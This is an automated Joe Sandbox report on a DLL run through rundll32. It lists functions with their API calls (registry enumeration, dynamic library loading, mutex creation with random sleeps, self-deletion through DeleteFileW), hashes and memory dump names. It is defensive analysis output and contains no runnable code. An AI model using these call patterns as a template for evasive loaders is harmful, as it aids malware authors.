Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: File$AttributesDelete$DirectoryEnvironmentExpandRemoveStrings
String ID:
API String ID: 4255994873-0
Opcode ID: e546ce504db48212e5272dbf9f723b57ca87e23394bff795ec25ce4fdcdf01af
Instruction ID: 556d7ccb380ff013333d2e661f5537bee02f7fbdde4fc716515a847050d3a558
Opcode Fuzzy Hash: e546ce504db48212e5272dbf9f723b57ca87e23394bff795ec25ce4fdcdf01af
Instruction Fuzzy Hash: 56E14966728D8194DB60DF2AD4512B973B2FB91B6CFC491A2DA0E435A0EF3CD64AC310

Function 00007FFE1A513170 Relevance: 13.8, APIs: 9, Instructions: 332registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FFE1A5131C0

Part of subcall function 00007FFE1A515980: GetProcessHeap.KERNEL32(?,?,?,00007FFE1A5167BF), ref: 00007FFE1A515989

RegEnumKeyExW.ADVAPI32 ref: 00007FFE1A513291
RegOpenKeyExW.ADVAPI32 ref: 00007FFE1A5132C2
RegQueryValueExW.ADVAPI32 ref: 00007FFE1A5132FE

Part of subcall function 00007FFE1A512500: WideCharToMultiByte.KERNEL32 ref: 00007FFE1A512535
Part of subcall function 00007FFE1A512500: WideCharToMultiByte.KERNEL32 ref: 00007FFE1A512578

RegQueryValueExW.ADVAPI32 ref: 00007FFE1A5133EE
RegQueryValueExW.ADVAPI32 ref: 00007FFE1A5134D0
RegCloseKey.ADVAPI32 ref: 00007FFE1A513595
RegEnumKeyExW.ADVAPI32 ref: 00007FFE1A5135D4
RegCloseKey.ADVAPI32 ref: 00007FFE1A513653

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: QueryValue$ByteCharCloseEnumMultiOpenWide$HeapProcess
String ID:
API String ID: 2740835775-0
Opcode ID: 94983d7cfb841727e5dd1a9b62022a2b6c6c50ca8c1aaca057d95404d2d5dd1a
Instruction ID: d492ca8e11f235a46c77efb5fd59feb511ada28ed914eb27b9191116056745fe
Opcode Fuzzy Hash: 94983d7cfb841727e5dd1a9b62022a2b6c6c50ca8c1aaca057d95404d2d5dd1a
Instruction Fuzzy Hash: 30F1916270CBC295EB61CF12E4503B9B7A2FB96B68F8841B6CA8D476A5DF3DD105C310

Function 00007FFE1A511990 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ce9d91ef6712de882bb66c4feffc82626b6abde2748bdc3da009eb6c5ce1676
Instruction ID: ccbcdc4689615ccc7d3903e03e0a34c4d53c6fce030f7b96c677450661a0b51d
Opcode Fuzzy Hash: 1ce9d91ef6712de882bb66c4feffc82626b6abde2748bdc3da009eb6c5ce1676
Instruction Fuzzy Hash: 7711653B334916076B4D853E9833DB81292C7D76057C9F77DED4ACA685EA2A441A8305

Function 00007FFE1A5163E0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 172libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A516404
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A51643B
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A516472
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A5164A9
LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A5164D9
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A516510
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A516547
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A51657E
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A5165B5
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A5165EC

Strings

, xrefs: 00007FFE1A51667D

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-3916222277
Opcode ID: a37ed814ba2cf336e4cbddf834b1582fd7b3911756c1b499f3e3b000daf6ff87
Instruction ID: aa28e73ee2027131957a6cb940cd52b173305a206f702e5c4e34a19894a9f935
Opcode Fuzzy Hash: a37ed814ba2cf336e4cbddf834b1582fd7b3911756c1b499f3e3b000daf6ff87
Instruction Fuzzy Hash: 2581A724B0DF4295EA50DB63B86457A62A2EF8AFB0F4800F7D94E86B71DE3CE0458710

Function 00007FFE1A51B0EC Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,00000000,00007FFE1A518A17,?,?,?,00007FFE1A518BDB), ref: 00007FFE1A51B0FD
free.LIBCMT ref: 00007FFE1A51B11A

Part of subcall function 00007FFE1A51BD68: HeapFree.KERNEL32(?,?,00000000,00007FFE1A519E06,?,?,0000000D,00007FFE1A519BA1,?,?,?,?,00007FFE1A51F956,?,?,0000000D), ref: 00007FFE1A51BD7E
Part of subcall function 00007FFE1A51BD68: _errno.LIBCMT ref: 00007FFE1A51BD88
Part of subcall function 00007FFE1A51BD68: GetLastError.KERNEL32(?,?,00000000,00007FFE1A519E06,?,?,0000000D,00007FFE1A519BA1,?,?,?,?,00007FFE1A51F956,?,?,0000000D), ref: 00007FFE1A51BD90

free.LIBCMT ref: 00007FFE1A51B12F
free.LIBCMT ref: 00007FFE1A51B150
free.LIBCMT ref: 00007FFE1A51B165
free.LIBCMT ref: 00007FFE1A51B179
free.LIBCMT ref: 00007FFE1A51B185
free.LIBCMT ref: 00007FFE1A51B1B0
EncodePointer.KERNEL32(?,?,00000000,00007FFE1A518A17,?,?,?,00007FFE1A518BDB), ref: 00007FFE1A51B1B8
free.LIBCMT ref: 00007FFE1A51B1D1
free.LIBCMT ref: 00007FFE1A51B1EA
free.LIBCMT ref: 00007FFE1A51B21B

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: d50e3eed459c5a564bc60c06b1be1ee3dad7a8f450d3f2393c249fb5f7f75772
Instruction ID: 30f20caebd803335d7c62a605989ce71dca92db8db544843ea1c6142eb2473e1
Opcode Fuzzy Hash: d50e3eed459c5a564bc60c06b1be1ee3dad7a8f450d3f2393c249fb5f7f75772
Instruction Fuzzy Hash: D531EA65F4DE4682FE599B53E8553786262BF87FB0F0A05F7D91E0A2B2CF2DA444C200

Function 00007FFE1A51DDF4 Relevance: 16.3, APIs: 13, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00007FFE1A51DE12

Part of subcall function 00007FFE1A51BD68: HeapFree.KERNEL32(?,?,00000000,00007FFE1A519E06,?,?,0000000D,00007FFE1A519BA1,?,?,?,?,00007FFE1A51F956,?,?,0000000D), ref: 00007FFE1A51BD7E
Part of subcall function 00007FFE1A51BD68: _errno.LIBCMT ref: 00007FFE1A51BD88
Part of subcall function 00007FFE1A51BD68: GetLastError.KERNEL32(?,?,00000000,00007FFE1A519E06,?,?,0000000D,00007FFE1A519BA1,?,?,?,?,00007FFE1A51F956,?,?,0000000D), ref: 00007FFE1A51BD90

free.LIBCMT ref: 00007FFE1A51DE24
free.LIBCMT ref: 00007FFE1A51DE36
free.LIBCMT ref: 00007FFE1A51DE48
free.LIBCMT ref: 00007FFE1A51DE5A
free.LIBCMT ref: 00007FFE1A51DE6C
free.LIBCMT ref: 00007FFE1A51DE7E
free.LIBCMT ref: 00007FFE1A51DE90
free.LIBCMT ref: 00007FFE1A51DEA2
free.LIBCMT ref: 00007FFE1A51DEB4
free.LIBCMT ref: 00007FFE1A51DEC9
free.LIBCMT ref: 00007FFE1A51DEDE
free.LIBCMT ref: 00007FFE1A51DEF3

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: a8b2a289d4c0a6b6613f778cf812589fef98729b94d43987965d83073c14ea8e
Instruction ID: 44e40c503b30e7b83a3fbe254c247d9da1368ac7768c4b67a6c5f576af8de3d3
Opcode Fuzzy Hash: a8b2a289d4c0a6b6613f778cf812589fef98729b94d43987965d83073c14ea8e
Instruction Fuzzy Hash: B3319353B0DD0291EAA4AB63D4925782362AFD2F61F4515F3D50E9A5B6CF2DE884C320

Function 00007FFE1A517470 Relevance: 15.1, APIs: 10, Instructions: 115libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A5174A2
GetProcAddress.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A5174DA
GetProcAddress.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A517512
GetProcAddress.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A51754A
LoadLibraryW.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A51757B
GetProcAddress.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A5175B3
GetProcAddress.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A5175EB
GetProcAddress.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A517623
LoadLibraryW.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A517654
GetProcAddress.KERNEL32(?,?,?,?,00007FFE1A516E54), ref: 00007FFE1A51768C

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 0e2ac940d25909e8ea2453ce127a0fa38817dae2df4a139c0689f8913fe7d8ff
Instruction ID: bc180db81493bdef6bbe2621dc9756da442f3f883a867604d3824032ac3a3172
Opcode Fuzzy Hash: 0e2ac940d25909e8ea2453ce127a0fa38817dae2df4a139c0689f8913fe7d8ff
Instruction Fuzzy Hash: 6C516F24F1DF0395EA50DB63A86537962A2AF9BFB8F4400F7D84E86676DF3CA0448610

Function 00007FFE1A514DC0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFE1A514DFC
GetProcAddress.KERNEL32 ref: 00007FFE1A514E22
GetProcAddress.KERNEL32 ref: 00007FFE1A514E48
LoadLibraryW.KERNEL32 ref: 00007FFE1A514E6B
GetProcAddress.KERNEL32 ref: 00007FFE1A514E91
GetModuleFileNameW.KERNEL32 ref: 00007FFE1A514FAC
sprintf_s.LIBCMTD ref: 00007FFE1A515016

Strings

"%ls",%ls %ls, xrefs: 00007FFE1A514FF5

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad$FileModuleNamesprintf_s
String ID: "%ls",%ls %ls
API String ID: 516877753-3684409233
Opcode ID: bfabd3e6904ca4b10914a67c278fe26b76a8ce5c833b3c8ae61e8cc866bba34c
Instruction ID: 311693ab5421ab2a0c28659eb4aa2a3818740c78058ee1678e34541ad8094a2d
Opcode Fuzzy Hash: bfabd3e6904ca4b10914a67c278fe26b76a8ce5c833b3c8ae61e8cc866bba34c
Instruction Fuzzy Hash: 74718155B2CE8291EA10EB63D8515BA63A2EF86FA4F8440F3D90E47BA6DF3CD505C350

Function 00007FFE1A517900 Relevance: 12.1, APIs: 8, Instructions: 136libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFE1A517927
GetProcAddress.KERNEL32 ref: 00007FFE1A51795E
GetProcAddress.KERNEL32 ref: 00007FFE1A517995
LoadLibraryW.KERNEL32 ref: 00007FFE1A5179C5
GetProcAddress.KERNEL32 ref: 00007FFE1A5179FC
GetProcAddress.KERNEL32 ref: 00007FFE1A517A33
GetProcAddress.KERNEL32 ref: 00007FFE1A517A6A
GetProcAddress.KERNEL32 ref: 00007FFE1A517AA1

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: b3a517e90219411be57b913e81de3b1f57b45dfff69b19ed2bf1c57f96d5bf23
Instruction ID: 67736c517a1c629a52ca04c5c2a9ef55528a6bd1a73201a8a9b0b4eb683022cb
Opcode Fuzzy Hash: b3a517e90219411be57b913e81de3b1f57b45dfff69b19ed2bf1c57f96d5bf23
Instruction Fuzzy Hash: 5E61B225B0DF0292EA40EB63E86417963A6AF87FB4F4400F7D98E46775EE3CE445C600

Function 00007FFE1A518DDC Relevance: 12.1, APIs: 8, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 00007FFE1A518DF9

Part of subcall function 00007FFE1A51CBCC: _errno.LIBCMT ref: 00007FFE1A51CBD5
Part of subcall function 00007FFE1A51CBCC: _invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A51CBE0

_errno.LIBCMT ref: 00007FFE1A518E09

Part of subcall function 00007FFE1A519B98: _getptd_noexit.LIBCMT ref: 00007FFE1A519B9C

_errno.LIBCMT ref: 00007FFE1A518E25
_isatty.LIBCMT ref: 00007FFE1A518E86
_getbuf.LIBCMT ref: 00007FFE1A518E92
_write.LIBCMT ref: 00007FFE1A518EC5
_lseeki64.LIBCMT ref: 00007FFE1A518F14
_write.LIBCMT ref: 00007FFE1A518F3E

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: _errno$_write$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty_lseeki64
String ID:
API String ID: 2111832858-0
Opcode ID: 7cce346b07e141824153703f7002546526c968b2cadd93361a8cb30d444bcdf2
Instruction ID: 0792240dd50de3d81f897db9699c2b2e931819898a7f9d02f076ed82f3785b38
Opcode Fuzzy Hash: 7cce346b07e141824153703f7002546526c968b2cadd93361a8cb30d444bcdf2
Instruction Fuzzy Hash: E141AD72B0CA4286EB659F26C44167837A2EB46F64F1442F6DA6D473E6DF3CE850C780

Function 00007FFE1A517FEC Relevance: 10.6, APIs: 7, Instructions: 122COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A518017
_errno.LIBCMT ref: 00007FFE1A51800C

Part of subcall function 00007FFE1A519B98: _getptd_noexit.LIBCMT ref: 00007FFE1A519B9C

_errno.LIBCMT ref: 00007FFE1A5180BA
_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A5180C5

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
String ID:
API String ID: 1573762532-0
Opcode ID: 6674f68310a896f2c3fef97c531cc157da707083ba8e2f1388e7ea58d2d12ecc
Instruction ID: 58e98355ba2565269077e5d29dca5cdf37d4d253aed35778292a9f2e5981e710
Opcode Fuzzy Hash: 6674f68310a896f2c3fef97c531cc157da707083ba8e2f1388e7ea58d2d12ecc
Instruction Fuzzy Hash: CB410872F0CB9685EB716B1394402B962A2EB12FA4F9441F3DA9C036E1DF2CE940C340

Function 00007FFE1A5116C0 Relevance: 10.6, APIs: 7, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FFE1A511701
RegEnumKeyExW.ADVAPI32 ref: 00007FFE1A511767
RegOpenKeyExW.ADVAPI32 ref: 00007FFE1A5117A3
RegQueryValueExW.ADVAPI32 ref: 00007FFE1A5117C8
RegCloseKey.ADVAPI32 ref: 00007FFE1A5117DC
RegEnumKeyExW.ADVAPI32 ref: 00007FFE1A51181A
RegCloseKey.ADVAPI32 ref: 00007FFE1A511838

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: CloseEnumOpen$QueryValue
String ID:
API String ID: 2548805652-0
Opcode ID: 5d7b43181d3d4d73633ebb36b72b8cfe0eee21ba08ea4b38994a31654aafabc1
Instruction ID: fc4a4bf8339452048dfd50fc9884cf4a1a2d3d1865768d93b790edebff1097c6
Opcode Fuzzy Hash: 5d7b43181d3d4d73633ebb36b72b8cfe0eee21ba08ea4b38994a31654aafabc1
Instruction Fuzzy Hash: 6541403671CEC281D7708B22B8847BAB3A5FB85B64F4041A6D98D53A64DF3CD1459704

Function 00007FFE1A520674 Relevance: 10.5, APIs: 7, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FFE1A520689

Part of subcall function 00007FFE1A519B98: _getptd_noexit.LIBCMT ref: 00007FFE1A519B9C

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A520694
_flush.LIBCMT ref: 00007FFE1A5206A3
_freebuf.LIBCMT ref: 00007FFE1A5206AD
_fileno.LIBCMT ref: 00007FFE1A5206B5
_close.LIBCMT ref: 00007FFE1A5206BC

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: _close_errno_fileno_flush_freebuf_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2366826396-0
Opcode ID: 89fb5cea9b6ee5bb09bbb3bb6aa743988ab54a6a14af7b79b44bd93ebf78b2e4
Instruction ID: f350cf693bb30d6b168158c5ceda17d3f83db44a004fc69d9dd198cbf1eb88e6
Opcode Fuzzy Hash: 89fb5cea9b6ee5bb09bbb3bb6aa743988ab54a6a14af7b79b44bd93ebf78b2e4
Instruction Fuzzy Hash: 86014F62F0EE4281FA256AB7849537C11535F97F78F2906F3D919561F2CE6CEC418640

Function 00007FFE1A515670 Relevance: 9.2, APIs: 6, Instructions: 177sleepsynchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32 ref: 00007FFE1A5156A5
Sleep.KERNEL32 ref: 00007FFE1A5156B8
CloseHandle.KERNEL32 ref: 00007FFE1A5156C1
Sleep.KERNEL32 ref: 00007FFE1A51570F
GetTickCount.KERNEL32 ref: 00007FFE1A515715
rand.LIBCMT ref: 00007FFE1A515722

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: Sleep$CloseCountCreateHandleMutexTickrand
String ID:
API String ID: 2360725408-0
Opcode ID: a32011b2d91c7620bf13179f0503f160f340ac96adcb2a6ebed98f9122dbb530
Instruction ID: 6c0a57df65323731e96dd395d09923cda0447abe9151d42cc36c9a474ec28d10
Opcode Fuzzy Hash: a32011b2d91c7620bf13179f0503f160f340ac96adcb2a6ebed98f9122dbb530
Instruction Fuzzy Hash: 0A719F66B1CE8291DA14DB6694521B9B3A2FF86FA4F8481B7DA4E037A1DF3CD506C310

Function 00007FFE1A5122D0 Relevance: 9.1, APIs: 6, Instructions: 71libraryloaderfileCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFE1A5122F9
GetProcAddress.KERNEL32 ref: 00007FFE1A51231F
GetProcAddress.KERNEL32 ref: 00007FFE1A512345
GetProcAddress.KERNEL32 ref: 00007FFE1A51236B
GetModuleFileNameW.KERNEL32 ref: 00007FFE1A512396
DeleteFileW.KERNEL32 ref: 00007FFE1A5123D6

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$File$DeleteLibraryLoadModuleName
String ID:
API String ID: 3615269725-0
Opcode ID: e4ac4f7ceeb8d0e53d313407caf9963976f0c950728a3915b3837e31b5afdf68
Instruction ID: 4d67cf53ca6454e1b08f2a492e12bb3aa72a28e072d0dd13e739110065715792
Opcode Fuzzy Hash: e4ac4f7ceeb8d0e53d313407caf9963976f0c950728a3915b3837e31b5afdf68
Instruction Fuzzy Hash: 66310B21B1CA8691EE10EB63E8645B95392EF8AFE4F8400F3D94E47B66DE2CD105C710

Function 00007FFE1A51DA54 Relevance: 7.6, APIs: 5, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00007FFE1A51DAB6
